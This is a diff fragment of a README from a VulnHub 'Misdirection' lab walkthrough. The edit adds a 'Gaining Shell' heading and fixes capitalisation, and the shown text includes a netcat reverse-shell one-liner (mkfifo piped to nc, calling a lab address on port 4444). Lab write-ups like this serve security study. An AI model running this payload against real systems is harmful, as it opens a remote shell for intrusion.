Git-K3rnel/VulnHub/Challenges/Misdirection/README.md

 this is a virtual shell on web, which we can insert any command on it, why not  a reverse shell ?

+## 3.Gaining Shell

-so just use this payload and start a listener on your machine :
+So just use this payload and start a listener on your machine :

 ```bash
 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.127.128 4444 >/tmp/f